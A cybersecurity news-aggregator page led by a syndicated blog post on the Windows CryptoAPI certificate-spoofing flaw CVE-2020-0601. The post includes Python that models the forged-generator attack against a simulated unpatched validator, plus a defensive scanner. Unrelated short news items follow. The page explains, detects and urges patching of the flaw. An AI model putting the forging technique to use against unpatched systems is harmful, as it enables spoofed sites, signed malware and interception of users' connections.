#cybersecurity | #hackerspace | NSA: Microsoft Releases Patch to Fix Latest Windows 10 Vulnerability

Source: National Cyber Security – Produced By Gregory Evans

NSA discloses a Windows security flaw that leaves more than 900 million devices vulnerable to spoofed digital certificates

The National Security Agency (NSA) isn’t exactly known for wanting to share information about vulnerabilities it discovers. In fact, it kept the Windows SMB bug behind the EternalBlue exploit secret for at least five years so it could use it in its own digital espionage. (At least, you know, until the exploit was stolen and published by the hacker group calling itself the Shadow Brokers.)

But maybe they’ve had a change of heart. (If you truly believe that, I have a bridge to sell you.)

The NSA, in an uncharacteristic show of transparency, recently announced a major public key infrastructure (PKI) security issue in Microsoft Windows that has left more than 900 million PCs and servers worldwide vulnerable to spoofing attacks. It is one of the vulnerabilities Microsoft patched in its January 2020 security updates (released January 14, 2020). Maybe they didn’t want a repeat of the last incident. Whatever the reason, we’re just glad they decided to disclose the flaw rather than sit on it.

The risk boils down to a certificate-validation weakness in a core cryptographic API of Microsoft’s widely used operating systems. But what exactly is this Windows 10 vulnerability? How does it affect your organization? And what can you do to fix it?

Let’s hash it out.

What’s the Situation with This Windows 10 Vulnerability?

Windows 10 has been having a rough go of things these past several months in terms of vulnerabilities. In the latest Windows 10 vulnerability news, the NSA reported a flaw (CVE-2020-0601) in the cryptographic functionality of 32- and 64-bit Windows 10 and of Windows Server 2016 and 2019. The bug lives in the Windows cryptographic application programming interface, CryptoAPI (the good ol’ Crypt32.dll module), and affects how it validates elliptic curve cryptography (ECC) certificates. An X.509 certificate can identify its curve either by name (an OID such as secp256r1) or by spelling out the curve parameters explicitly. When handed explicit parameters, the unpatched CryptoAPI matched the certificate to a trusted root by comparing public key points only; it never checked that the explicit parameters, in particular the curve’s base point (the generator), were the same as the trusted root’s. That gap is exactly what an attacker can exploit.

What it allows, in a nutshell, is for attackers to stand up websites and sign software that masquerade as the “real deals” through spoofed digital certificates. A great demonstration was put together by security researcher Saleem Rashid, who tweeted images of NSA.gov and GitHub.com getting “Rickrolled.” Essentially, he presented forged certificates for those HTTPS sites and got both Edge and Chrome (both of which relied on Windows CryptoAPI for certificate validation at the time) to accept them without a warning. Firefox, which uses its own certificate validation library rather than CryptoAPI, was not affected.

Although humorous, Rashid’s simulated attacks are a great demonstration of how serious the security flaw is. By spoofing a digital certificate that exploits the security flaw in CryptoAPI, anyone can pretend to be anyone, even official authorities.

CryptoAPI is a critical component of Microsoft Windows operating systems. It’s what allows developers to secure their software applications through cryptographic solutions. It’s also what validates the legitimacy of software and secure website connections through the use of X.509 digital certificates (SSL/TLS certificates, code signing certificates, email signing certificates, etc.). So, basically, the vulnerability is a bug in the OS component that determines whether software applications and emails are trustworthy and whether secure website connections are legitimate.

So, what the vulnerability does is let an attacker bypass the trust store check: malicious software signed with a forged ECC certificate (one that chains, as far as the unpatched CryptoAPI can tell, to a trusted root CA) looks like it was signed by a trusted organization. This means users would unknowingly download malicious or compromised software because the digital signature would appear to come from a legitimate source.
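To make the mechanism concrete, here is an added example, not code from the original article or from Microsoft or the NSA: a pure-Python model of ECDSA over NIST P-256 in which the curve’s generator is treated as a per-certificate parameter, which is exactly what a certificate with explicit EC parameters carries. The keys, the nonce and the leaf-certificate bytes are constructed for the example, and `chain_to_root` is a hypothetical stand-in for CryptoAPI’s trust decision, not Microsoft’s code. Given only the trusted root’s public key Q, the attacker picks any private key d' and a generator G' = d'^-1 · Q, so that d' · G' = Q; a validator that matches roots by public key alone then accepts the attacker’s signatures as the root’s.

```python
import hashlib

# NIST P-256 (secp256r1): field prime, curve coefficients, group order, generator.
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)


def ec_add(p1, p2):
    """Affine point addition on y^2 = x^3 + Ax + B over GF(P); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P   # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P          # addition
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, point):
    """Double-and-add scalar multiplication (not constant time; illustration only)."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def hash_to_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(priv, msg, gen, k):
    """ECDSA over the curve with generator `gen`; `k` is a fixed nonce so the example is reproducible."""
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (hash_to_int(msg) + r * priv) % N
    return (r, s)


def ecdsa_verify(pub, msg, sig, gen):
    """Textbook ECDSA verification, parameterised by whichever generator the verifier trusts."""
    r, s = sig
    w = pow(s, -1, N)
    z = hash_to_int(msg)
    x = ec_add(ec_mul(z * w % N, gen), ec_mul(r * w % N, pub))
    return x is not None and x[0] % N == r


def forge_generator(victim_pub, attacker_priv):
    """Choose G' = attacker_priv^-1 * Q so that attacker_priv * G' == Q (the victim's public key)."""
    return ec_mul(pow(attacker_priv, -1, N), victim_pub)


def chain_to_root(leaf_tbs, leaf_sig, presented_root, trusted_root, check_params):
    """Hypothetical model of the trust decision: does the presented issuer key match a trusted root?"""
    if presented_root["pub"] != trusted_root["pub"]:
        return False
    if check_params and presented_root["gen"] != trusted_root["gen"]:
        return False  # patched behaviour: explicit parameters must match the trusted root's
    # Unpatched behaviour: verify with the parameters the presented certificate supplies.
    return ecdsa_verify(presented_root["pub"], leaf_tbs, leaf_sig, presented_root["gen"])


def curveball_demo():
    """Run the attack against an unpatched and a patched checker; return the outcomes."""
    # Constructed root CA key: the attacker never learns root_priv, only the public point.
    root_priv = 0x1F4C2A9B7E3D5F6081A2B3C4D5E6F70819283A4B5C6D7E8F9A0B1C2D3E4F5061
    trusted_root = {"pub": ec_mul(root_priv, G), "gen": G}
    # Attacker-chosen private key and the matching forged generator.
    attacker_priv = 0x0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
    forged_gen = forge_generator(trusted_root["pub"], attacker_priv)
    forged_root = {"pub": trusted_root["pub"], "gen": forged_gen}  # same Q, different G
    leaf_tbs = b"CN=github.com (constructed leaf certificate body)"
    leaf_sig = ecdsa_sign(attacker_priv, leaf_tbs, forged_gen,
                          k=0x6E0F5D4C3B2A19080706050403020100F1E2D3C4B5A69788796A5B4C3D2E1F01)
    return {
        "forged_key_matches_root": ec_mul(attacker_priv, forged_gen) == trusted_root["pub"],
        "unpatched_accepts": chain_to_root(leaf_tbs, leaf_sig, forged_root, trusted_root, False),
        "patched_accepts": chain_to_root(leaf_tbs, leaf_sig, forged_root, trusted_root, True),
        "genuine_params_reject_sig": ecdsa_verify(trusted_root["pub"], leaf_tbs, leaf_sig, G),
    }


if __name__ == "__main__":
    for name, outcome in curveball_demo().items():
        print(f"{name}: {outcome}")
```

The last entry in the result is the point to take away: the very same signature that the unpatched checker accepts fails the moment the verifier insists on the genuine curve’s generator, because the attacker never had the root’s private key. The point arithmetic here is the unhardened textbook version and exists only to show the trust-decision bug, not to be reused.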

This vulnerability can cause other issues as well, according to the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA):

“This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.”

Does This Mean ECC Is Not Secure?

No. This flaw in no way, shape, or form affects the integrity of ECC certificates or of the underlying mathematics. It does, however, cast a negative light on Windows’ cryptographic application programming interface by shining a spotlight on the shortcomings of its validation process.

Let me reiterate: this is a flaw in the validation logic of Windows CryptoAPI and does not affect the integrity of ECC certificates themselves. If you’re one of the few using ECC certificates (RSA is still more commonly used than ECC), this doesn’t impact the security of your certificates or your private keys. The certificates an attacker forges are not issued by your CA and are not signed with your key; they simply reuse a trusted root’s public key point alongside attacker-chosen curve parameters.

The patch from Microsoft addresses the vulnerability by making Windows CryptoAPI fully validate ECC certificates: a certificate’s explicit curve parameters must now actually match those of the trusted root it claims to chain to, rather than being ignored in favor of a public key comparison alone.

What This Windows 10 Vulnerability Means for Your Organization

Basically, this cryptographic validation flaw impacts both SSL/TLS connection security and Windows Authenticode file validation. Malicious actors who exploit the CryptoAPI vulnerability could use it to:

  • defeat trusted network connections to carry out man-in-the-middle (MitM) attacks and compromise confidential information;
  • deliver malicious executable code;
  • get browsers that rely on CryptoAPI to accept, without any warning, a maliciously crafted certificate issued for a hostname that never authorized it; and
  • appear as legitimate and trusted entities (through spoofing) to get users to engage with and download malicious content via email and phishing websites.

The NSA press release states:

“NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners.”

Steps to Take to Mitigate This Bug

Wondering what you should do to mitigate the threat on your network and devices? The NSA has a few recommendations:

Get to Patchin’ ASAP

The NSA recommends installing the newly released patch from Microsoft for Windows 10 and Windows Server 2016 and 2019 as soon as possible on all endpoints and systems. Like, right now. Get to it! As a best practice, you can also turn on automatic updates to ensure that you don’t miss key updates in the future.

According to Microsoft’s Security Update Guide:

“After the applicable Windows update is applied, the system will generate Event ID 1 in the Event Viewer after each reboot under Windows Logs/Application when an attempt to exploit a known vulnerability ([CVE-2020-0601] cert validation) is detected.”

Here at The SSL Store, we’ve already rolled out the patch to ensure that all of our servers and endpoint devices are protected. (Thanks, Ross!) Rolling out these kinds of updates is something you don’t want to wait around to do because it leaves your operating systems — and everything else as a result — vulnerable to spoofing and phishing attacks using spoofed digital certificates.

Prioritize Your Patching Initiatives

But what if you’re a major enterprise that can’t just get it done with a snap of the fingers? (Yeah, we know how you big businesses sometimes like to do things.) In that case, the NSA recommends prioritizing the patching of your most critical endpoints and those that are most exposed to the internet. Basically, patch your mission-critical systems and infrastructure, internet-facing systems, and networked servers first.

Implement Network Prevention and Detection Measures

For those of you who route your traffic through proxy devices, we have some good news. While your endpoints are getting patched, your proxy devices can help protect them and point you at the ones still exposed. A properly configured TLS inspection proxy validates SSL/TLS certificates from third parties with its own validation logic rather than the endpoint’s CryptoAPI, so it will reject a forged certificate that a vulnerable endpoint would have accepted, and a proxy that logs rejected certificates gives you a place to look for attempts against endpoints you haven’t patched yet.

You can also extract certificates from logs and packet captures and inspect them with tools such as OpenSSL or Windows certutil. For this flaw, a certificate that identifies its curve by name (an OID such as secp256r1) is benign; one that spells out explicit curve parameters is suspicious, and one whose explicit parameters only partly match a standard curve while carrying the public key of a trusted root is a strong sign of an exploit attempt.
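As an added example (not code from the article, the NSA advisory, Microsoft, or any tool they name), here is a small Python triage scanner that does that check offline: it locates the id-ecPublicKey AlgorithmIdentifier in a DER or PEM certificate, reports whether the curve is given by name or by explicit parameters, and, when the parameters are explicit and the field prime is P-256’s, flags a base point that differs from the standard generator. The two sample inputs are constructed SubjectPublicKeyInfo structures built by the `tlv` helper, not real certificates; the scanner behaves the same on a full certificate because the SPKI is embedded in it unchanged.

```python
import base64
import re

# DER OID content bytes: id-ecPublicKey, prime-field, and the P-256 named curve.
OID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")
OID_PRIME_FIELD = bytes.fromhex("2a8648ce3d0101")
NAMED_CURVES = {bytes.fromhex("2a8648ce3d030107"): "secp256r1 (P-256)",
                bytes.fromhex("2b81040022"): "secp384r1 (P-384)",
                bytes.fromhex("2b81040023"): "secp521r1 (P-521)"}
P256_PRIME = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
P256_B = bytes.fromhex("5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b")
P256_GENERATOR = bytes.fromhex(  # uncompressed point: 0x04 || x || y
    "046b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296"
    "4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5")


def tlv(tag, body):
    """Minimal DER TLV encoder (bodies up to 65535 bytes); used to build the samples."""
    n = len(body)
    length = bytes([n]) if n < 0x80 else bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xFF])
    return bytes([tag]) + length + body

def der_int(value):
    """DER INTEGER for a non-negative int; the extra byte keeps the sign bit clear."""
    return tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))

def read_tlv(data, pos):
    """Decode one DER TLV at `pos`; return (tag, body, position after it)."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length >= 0x80:                     # long form: (length & 0x7F) length bytes follow
        nbytes = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + nbytes], "big"), pos + nbytes
    return tag, data[pos:pos + length], pos + length

def to_pem(der, label=b"CERTIFICATE"):
    """Wrap DER bytes in a PEM block with 64-character lines."""
    b64 = base64.b64encode(der)
    body = b"\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return b"-----BEGIN " + label + b"-----\n" + body + b"\n-----END " + label + b"-----\n"

def load_der(data):
    """Accept raw DER or a PEM block and return the DER bytes."""
    if data.lstrip().startswith(b"-----BEGIN"):
        return base64.b64decode(b"".join(re.sub(rb"-----[^-]+-----", b"", data).split()))
    return data

def classify_ec_key(der):
    """Locate the id-ecPublicKey AlgorithmIdentifier and classify its parameters as
    ("namedCurve", name) | ("explicit", {"prime", "base"}) | ("implicitlyCA", None) |
    ("unknown", None) | (None, None) when the input carries no EC key at all."""
    marker = tlv(0x06, OID_EC_PUBLIC_KEY)
    idx = der.find(marker)
    if idx < 0:
        return (None, None)
    tag, body, _ = read_tlv(der, idx + len(marker))
    if tag == 0x06:
        return ("namedCurve", NAMED_CURVES.get(body, "OID " + body.hex()))
    if tag == 0x05:
        return ("implicitlyCA", None)
    if tag != 0x30:
        return ("unknown", None)
    # ECParameters ::= SEQUENCE { version, fieldID, curve, base OCTET STRING, order, cofactor OPTIONAL }
    fields, pos = [], 0
    while pos < len(body):
        t, b, pos = read_tlv(body, pos)
        fields.append((t, b))
    prime = None
    if len(fields) > 1 and fields[1][0] == 0x30:  # fieldID ::= SEQUENCE { fieldType OID, parameters }
        _, ftype, fpos = read_tlv(fields[1][1], 0)
        if ftype == OID_PRIME_FIELD:
            prime = int.from_bytes(read_tlv(fields[1][1], fpos)[1], "big")
    base = fields[3][1] if len(fields) > 3 and fields[3][0] == 0x04 else None
    return ("explicit", {"prime": prime, "base": base})

def curveball_indicators(cert_bytes):
    """Findings for one certificate (DER or PEM); an empty list means nothing to see here."""
    kind, detail = classify_ec_key(load_der(cert_bytes))
    findings = []
    if kind == "explicit":
        findings.append("EC key uses explicit curve parameters instead of a named curve")
        if detail["prime"] == P256_PRIME and detail["base"] != P256_GENERATOR:
            findings.append("P-256 field with a non-standard base point: possible CVE-2020-0601 forgery")
    return findings

def build_spki(parameters, public_point):
    """Constructed SubjectPublicKeyInfo: SEQUENCE { SEQUENCE { OID, params }, BIT STRING point }."""
    return tlv(0x30, tlv(0x30, tlv(0x06, OID_EC_PUBLIC_KEY) + parameters) + tlv(0x03, b"\x00" + public_point))

def explicit_p256_parameters(base_point):
    """Explicit ECParameters encoding of P-256, with the base point chosen by the caller."""
    field = tlv(0x30, tlv(0x06, OID_PRIME_FIELD) + der_int(P256_PRIME))
    curve = tlv(0x30, tlv(0x04, (P256_PRIME - 3).to_bytes(32, "big")) + tlv(0x04, P256_B))
    return tlv(0x30, der_int(1) + field + curve + tlv(0x04, base_point) + der_int(P256_ORDER) + der_int(1))

# Constructed samples. The public point is P-256's generator reused as a placeholder, and the
# "forged" base point is deliberately not a real curve point: only its difference from G matters.
SAMPLE_NAMED = build_spki(tlv(0x06, bytes.fromhex("2a8648ce3d030107")), P256_GENERATOR)
SAMPLE_EXPLICIT_FORGED = build_spki(explicit_p256_parameters(b"\x04" + b"\xab" * 64), P256_GENERATOR)
```

Locating the key by searching for the OID is a heuristic that is fine for a triage script; a production check would walk the certificate structure instead. Named-curve certificates are not affected by this flaw, so an empty finding list is the expected result for almost every certificate you will encounter, and any explicit-parameter certificate deserves a closer look even when its base point is genuine.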

*** This is a Security Bloggers Network syndicated blog from Hashed Out by The SSL Store™ authored by Casey Crane. Read the original post at: https://www.thesslstore.com/blog/nsa-microsoft-releases-patch-to-fix-latest-windows-10-vulnerability/


The post #cybersecurity | #hackerspace | NSA: Microsoft Releases Patch to Fix Latest Windows 10 Vulnerability appeared first on National Cyber Security.

View full post on National Cyber Security

#cybersecurity | #infosec | LastPass releases its 3rd Annual Global Password Security report



Graham Cluley Security News is sponsored this week by the folks at LastPass. Thanks to the great team there for their support!

LastPass has analyzed over 47,000 businesses to bring you insights into security behavior worldwide. The report helps you explore changes in password security practices worldwide, and see where businesses are still putting themselves at risk.

The takeaway is clear: Many businesses are making significant strides in some areas of password and access security, but there is still a lot of work to be done. Use of important security measures like multifactor authentication is up, but the continued reality of poor password hygiene still hampers many businesses’ ability to achieve high standards of security.

In the report, we not only highlight key trends by company size, sector, and location, we provide analysis and recommendations to help IT and business leaders take action where it’s needed most.

Download the free report now to see the current state of password security, access, and authentication around the world – and learn what you can do today to better secure your company.



The post #cybersecurity | #infosec | LastPass releases its 3rd Annual Global Password Security report appeared first on National Cyber Security.


Adobe Releases Patches for ‘Likely Exploitable’ Critical Vulnerabilities



The last Patch Tuesday of 2019 is finally here.

Adobe today released updates for four of its widely used products, including Adobe Acrobat and Reader, Photoshop CC, ColdFusion, and Brackets, to patch a total of 25 new security vulnerabilities.

Seventeen of these flaws have been rated critical in severity, and most carry high-priority patches, Adobe’s signal that the affected product has historically been targeted in real-world attacks; there are currently no known exploits in the wild for these particular bugs.

The software update for Adobe Acrobat and Reader for Windows and macOS addresses a total of 21 security vulnerabilities, 14 of which are critical; the rest are rated important in severity.

Upon successful exploitation, all critical vulnerabilities in Adobe Acrobat and Reader software lead to arbitrary code execution attacks, allowing attackers to take complete control of targeted systems.

Adobe Photoshop CC for Windows and macOS contains patches for two critical arbitrary code execution vulnerabilities that were discovered and reported to the company by Honggang Ren of Fortinet’s FortiGuard Labs.

The last two flaws the company patched this month affect Brackets, a source code editor, and ColdFusion, a commercial rapid web application development platform by Adobe.


The software update for Brackets addresses a critical code execution flaw, which was disclosed by Tavis Ormandy of Google Project Zero.

Adobe ColdFusion update comes with a security patch for an important privilege escalation bug, which occurs due to insecure inherited permissions of the default installation directory.

The company has released updated versions of all four affected products for each impacted platform, which users should install immediately to protect their systems and businesses from cyber-attacks.

If your system hasn’t yet detected the availability of the new update automatically, you should manually install the update by choosing “Help → Check for Updates” in your Adobe software.


The post Adobe Releases Patches for ‘Likely Exploitable’ Critical Vulnerabilities appeared first on National Cyber Security.


China Releases Four Draft Guidelines in Relation to Cybersecurity Law


On August 31, 2017, the National Information Security Standardization Technical Committee of China published four draft voluntary guidelines (“Draft Guidelines”) in relation to the Cybersecurity Law of China. The Draft Guidelines are open for comment from the general public until October 13, 2017. Information Security Technology – Guidelines for Cross-Border…

The post China Releases Four Draft Guidelines in Relation to Cybersecurity Law appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

China releases emergency response plan for cyber security incidents


People’s Daily China reported that the Office of the Central Leading Group for Cyberspace Affairs has released a new emergency response plan for Internet security incidents on June 27. The plan is intended to “improve handling of cybersecurity incidents, prevent and reduce damage, protect the public interest and safeguard national…

The post China releases emergency response plan for cyber security incidents appeared first on National Cyber Security Ventures.


Rep releases draft ‘hacking back’ legislation

Rep. Tom Graves (R-Ga.) released updated legislation Thursday to allow victims of cyber crimes to hack their attackers back. The Active Cyber Defense Certainty Act (ACDC) would exempt victims from hacking laws when the aim is to identify the assailant, cut off attacks or retrieve stolen […]

View full post on AmIHackerProof.com | Can You Be Hacked?

Pearl Software Releases Echo Smart.Capture™ For Targeted Cybersecurity Analytics

Pearl Software, the creator of real-time, mobile Internet monitoring and web filtering, has released Echo Smart.Capture as part of its cybersecurity product line. Pearl Echo Version 12 R2 now includes the ability to monitor a user’s web browsing while filtering …

Father releases photos of bullied daughter moments from death on day she would have turned 18

A father has published photos showing his daughter minutes before she died to raise awareness of cyber-bullying and mental illness.

Adrian Derbyshire posted pictures of Julia hooked up to drips and machines in hospital to mark what would have been her 18th birthday.

Julia was 16 when Mr Derbyshire found her body at the family home in Warrington.

He attempted CPR, but she spent five days in hospital on life support and died in December 2015.

“I can’t tell you all how I feel as I’ve gone past the line of devastation and loss,” said Mr Derbyshire, writing on Facebook.

“But this devastating story of a beautiful young woman who had given up on herself and life due to others needs to be heard.


The post Father releases photos of bullied daughter moments from death on day she would have turned 18 appeared first on Parent Security Online.

View full post on Parent Security Online

MeetMe Releases Revamped MeetMe+ Subscription App

BUSINESS WIRE – Dec 10 – MeetMe, a public social discovery service, has released a major revamp of its MeetMe+ subscription product to increase the number of paying subscribers.

The post MeetMe Releases Revamped MeetMe+ Subscription App appeared first on Dating Scams 101.

View full post on Dating Scams 101

Hacker Cracks Lumia Bootloader, Releases Tool To Grant Root Access For Custom ROMs



Microsoft and Nokia have done a great job of making Lumia smartphones difficult to break into at a low-level, but software hacker Heathcliff has just proven that it’s not impossible. He’s just released a great-looking tool called Phone Internals, and it can do everything from unlocking the bootloader to replacing the phone’s ROM. Heathcliff welcomes donations by those who’ve found the tool useful. Based on the introduction video, it seems that a lot of effort went into this, and unlike most tools of this nature, detailed descriptions are found everywhere to ensure that you know exactly what’s going to happen once you click a button. According to the “Getting Started” section of the tool, supported models include Lumia 520, 521, 525, 620, 625, 720, 820, 920, 925, 928, 1020, and 1320. If your model is not on the list, don’t fret: Heathcliff has said that he hopes to add more models in the future. Even if you do have an appropriate PHONE ROM or run custom software, this tool could be used to root the device and give you the ability to back up the entire thing. Options are given to back up specific partitions, or everything en masse. Later, […]


The post Hacker Cracks Lumia Bootloader, Releases Tool To Grant Root Access For Custom ROMs appeared first on National Cyber Security.
